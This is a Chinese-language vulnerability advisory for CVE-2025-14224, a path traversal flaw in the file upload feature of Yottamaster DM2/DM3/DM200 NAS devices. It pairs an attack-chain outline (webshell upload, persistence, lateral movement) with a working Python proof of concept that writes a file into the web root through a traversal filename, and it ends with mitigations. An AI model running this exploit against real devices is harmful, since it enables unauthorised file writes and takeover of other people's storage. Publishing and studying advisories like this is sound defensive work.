CVE-2025-14224 Yottamaster NAS文件上传路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-14224

漏洞类型

路径遍历

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Yottamaster DM2/DM3/DM200 NAS设备

漏洞概述

CVE-2025-14224是影响Yottamaster品牌NAS设备（型号DM2、DM3和DM200）的安全漏洞。该漏洞存在于设备的文件上传功能组件中，由于对用户上传的文件名缺乏有效的路径验证和过滤，攻击者可以通过构造包含路径遍历序列（如../）的文件名，将文件写入设备文件系统的任意目录位置。攻击者无需高权限即可利用此漏洞，仅需具备低权限账户即可发起攻击。该漏洞的CVSS评分为4.3，属于中危级别，攻击向量为网络形式，远程即可利用。漏洞发现者已将相关信息提交至vuldb.com，公开的漏洞利用代码可能已被恶意行为者使用。Yottamaster厂商在收到漏洞披露通知后未做出任何回应，导致该漏洞至今未得到官方修复。对于使用受影响设备的用户，建议采取临时防护措施，避免将设备暴露在不可信的网络环境中。

技术细节

该路径遍历漏洞存在于Yottamaster NAS设备的Web管理界面文件上传模块中。漏洞的根本原因在于服务器端对用户提供的文件名参数缺少严格的输入验证和路径规范化处理。当用户上传文件时，系统直接将用户指定的文件名拼接到目标存储路径，而未过滤或清理文件名中的特殊字符和路径序列。攻击者可以利用路径遍历字符序列（如../或..\）突破预期的上传目录限制，将文件写入系统其他敏感位置，例如Web根目录、配置文件目录或系统关键路径。成功利用此漏洞可能导致以下后果：1）覆盖系统配置文件以获取持久化访问权限；2）上传恶意WebShell以实现远程代码执行；3）修改设备固件或设置；4）读取敏感配置文件获取凭据信息。由于漏洞影响的是文件上传这一常见功能，攻击门槛相对较低，结合已公开的漏洞利用代码，具有中等技术水平的攻击者即可成功实施攻击。

攻击链分析

STEP 1

信息收集

攻击者识别目标设备为Yottamaster NAS设备，确认设备型号和固件版本是否在受影响范围内

STEP 2

认证获取

攻击者使用低权限账户登录设备Web管理界面，或利用未授权访问接口获取会话

STEP 3

构造恶意请求

攻击者构造包含路径遍历序列的文件名，如../../../path/to/target，使用户上传的文件绕过目录限制

STEP 4

文件上传

通过设备的文件上传API发送恶意请求，服务器将文件写入攻击者指定的目标路径而非预期目录

STEP 5

权限提升/持久化

成功写入WebShell或修改配置文件，实现远程代码执行或持久化访问

STEP 6

横向移动

利用获取的访问权限进一步渗透内网，访问存储的敏感数据或其他联网系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib.parse

# CVE-2025-14224 PoC - Path Traversal in Yottamaster NAS File Upload
# Target: Yottamaster DM2/DM3/DM200 (versions up to 1.2.23/1.9.12)

TARGET = "http://target-ip:8080"  # Replace with target IP
USERNAME = "user"                # Low-privilege user
PASSWORD = "password"

def exploit_path_traversal():
    """
    Upload file via path traversal to write outside intended directory
    """
    session = requests.Session()
    
    # Step 1: Authentication
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    session.post(f"{TARGET}/api/login", data=login_data)
    
    # Step 2: Prepare malicious filename with path traversal
    # Target: Write to web root directory
    malicious_filename = "../../../www/html/payload.txt"
    
    # Step 3: Upload file with path traversal payload
    files = {
        "file": (malicious_filename, b"Malicious content", "text/plain")
    }
    
    response = session.post(
        f"{TARGET}/api/upload",
        files=files
    )
    
    print(f"Status: {response.status_code}")
    print(f"Response: {response.text}")
    
    # Step 4: Verify file was written to target location
    verify = session.get(f"{TARGET}/payload.txt")
    if verify.status_code == 200:
        print("[+] Exploit successful - File written via path traversal")
    else:
        print("[-] Exploit failed or file path incorrect")

if __name__ == "__main__":
    exploit_path_traversal()

影响范围

Yottamaster DM2 < 1.2.24

Yottamaster DM3 < 1.2.24

Yottamaster DM200 < 1.9.13

防御指南

临时缓解措施

在官方修复发布前，建议将Yottamaster NAS设备置于受信任的内部网络环境中，避免直接暴露在互联网。启用设备的安全日志监控功能，关注异常的文件上传行为。可考虑使用网络ACL限制对设备管理接口的访问，仅允许授权IP地址访问。对于必须开放远程访问的场景，建议通过VPN建立安全隧道。同时，定期备份设备配置和重要数据，以便在发生安全事件时能够快速恢复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14224
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14224
3 Details https://www.cvedetails.com/cve/CVE-2025-14224/
4 VulDB https://vuldb.com/cve/CVE-2025-14224
5 Link https://vuldb.com/?ctiid.334666
6 Link https://vuldb.com/?id.334666
7 Link https://vuldb.com/?submit.701673
8 Link https://www.notion.so/2b76cf4e528a80f6ae50fe21b13ff0b8
9 Link https://www.notion.so/Yottamaster-NAS-Unauth-Operation-2b76cf4e528a80f6ae50fe21b13ff0b8